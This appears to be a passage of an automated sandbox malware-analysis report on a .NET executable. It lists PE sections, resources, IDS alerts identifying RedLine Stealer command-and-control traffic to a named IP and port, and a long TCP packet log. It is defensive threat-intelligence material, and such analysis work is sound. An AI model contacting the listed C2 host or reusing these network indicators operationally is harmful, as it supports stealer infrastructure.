.rsrc	0x92000	0x1960	0x1a00	bbdf2158ec22dac0d0ff2ee904a9477d	False	0.7869591346153846	data	7.065214446905536	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x94000	0xc	0x200	8648462e87917693b85ed94d6d3c4084	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x92118	0x151a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8863383931877082
RT_GROUP_ICON	0x93634	0x14	data	0.9
RT_GROUP_ICON	0x93648	0x14	data	1.05
RT_VERSION	0x9365c	0x304	data	0.4365284974093264

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T17:42:08.895593+0100	1800000	Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect	1	192.168.2.4	49733	45.137.22.250	55615	TCP
2024-12-26T17:42:08.895593+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.4	49733	45.137.22.250	55615	TCP
2024-12-26T17:42:14.044425+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	45.137.22.250	55615	192.168.2.4	49733	TCP
2024-12-26T17:42:14.359736+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.4	49733	45.137.22.250	55615	TCP
2024-12-26T17:42:18.234335+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	45.137.22.250	55615	192.168.2.4	49733	TCP
2024-12-26T17:42:18.634917+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.4	49737	45.137.22.250	55615	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 17:42:07.399420977 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:07.519114017 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:07.519213915 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:07.534334898 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:07.654007912 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:07.894031048 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:08.013906002 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:08.849143028 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:08.895592928 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:13.924590111 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:13.924633026 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:14.044425011 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:14.044466019 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:14.359513998 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:14.359580994 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:14.359617949 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:14.359711885 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:14.359735966 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:14.359747887 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:14.359769106 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:14.411278963 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:14.436562061 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:14.436621904 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:14.436657906 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:14.436692953 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:14.436736107 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:14.438328028 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.113964081 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.114512920 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.234299898 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.234334946 CET	55615	49733	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.234383106 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.234412909 CET	49733	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.234985113 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.235176086 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.354505062 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.354583979 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.355020046 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.355032921 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.355082035 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.355140924 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.355370998 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.355432987 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.355509996 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.355592012 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.355664968 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.355676889 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.355732918 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.355806112 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.355879068 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.473557949 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.473608971 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.473653078 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.473706007 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.474088907 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.474174976 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.474554062 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.474616051 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.474745035 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.474776030 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.474806070 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.474817991 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.474881887 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.475019932 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.477833986 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.518959999 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.519085884 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.634722948 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.634917021 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.682743073 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.682830095 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:18.798718929 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.886744976 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:18.886820078 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.127005100 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.127077103 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.276899099 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.277213097 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.277363062 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.397056103 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397094965 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397124052 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397154093 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.397181034 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397208929 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397233009 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.397258043 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397275925 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.397285938 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397334099 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397346020 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.397378922 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397403955 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.397433996 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397443056 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.397460938 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397489071 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397520065 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397530079 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.397578955 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.397627115 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397696018 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397784948 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.397806883 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.397892952 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.397959948 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398009062 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398027897 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.398056030 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398067951 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.398083925 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398118019 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.398160934 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398166895 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.398242950 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.398262978 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398335934 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.398479939 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398526907 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398534060 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.398570061 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398628950 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.398680925 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398756981 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398772955 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.398916960 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.398989916 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.399008036 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.399066925 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.399080038 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.399156094 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.399185896 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.399223089 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.399311066 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.399354935 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.399399042 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.518763065 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.518837929 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.518873930 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.518976927 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.520126104 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.520191908 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.520215034 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.520287037 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.520833015 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.520926952 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.521502018 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.521564007 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.522995949 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.523063898 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.523135900 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.523212910 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.524529934 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.524600983 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.525835991 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.525886059 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.525949001 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.527905941 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.527934074 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.527971029 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.528013945 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.529947042 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.529997110 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.530038118 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.530092955 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.531101942 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531128883 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531161070 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531220913 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.531253099 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531327963 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.531476974 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531516075 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531539917 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.531549931 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531578064 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531589031 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.531622887 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531641960 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.531738997 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.531791925 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531819105 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531846046 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531876087 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.531884909 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.531929016 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.532120943 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532147884 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532177925 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532179117 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.532206059 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.532231092 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.532291889 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532355070 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.532429934 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532469034 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532485008 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.532545090 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.532557011 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532614946 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.532654047 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532680988 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532715082 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532716036 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.532742023 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532776117 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.532800913 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.532902002 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532915115 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532929897 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532957077 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.532967091 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.533010960 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.533078909 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533092022 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533113003 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533164024 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.533222914 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533235073 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533246040 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533267021 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533278942 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533293009 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533296108 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.533330917 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.533360004 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.533525944 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533570051 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533638954 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.533639908 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533669949 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533735991 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.533786058 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533797979 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533840895 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.533863068 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533875942 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533896923 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.533930063 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.533973932 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.640738010 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.640929937 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.640944958 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.640959978 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.641036034 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.641051054 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.641105890 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.641132116 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.641185045 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.642144918 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.642158031 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.642204046 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.642220020 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.642237902 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.642271042 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.642299891 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.642867088 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.642879009 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.642946959 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.643183947 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.643255949 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.643286943 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.643343925 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.644455910 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.644516945 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.644617081 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.644649982 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.644685984 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.644726038 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.644797087 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.644809008 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.644876003 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.645807028 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.645862103 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.645883083 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.645920992 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.645962000 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.645977020 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.646015882 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.646023035 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.646120071 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.646958113 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.647012949 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.647027016 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.647032976 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.647070885 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.647248030 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.647315979 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.649110079 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.649164915 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.649178028 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.649214983 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.649224043 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.649286032 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.650897980 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.650909901 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.650964975 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.650968075 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.651029110 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.651156902 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.651170015 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.651231050 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.651706934 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.651729107 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.651772976 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.651809931 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.651822090 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.651880980 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.651896000 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.651907921 CET	55615	49737	45.137.22.250	192.168.2.4
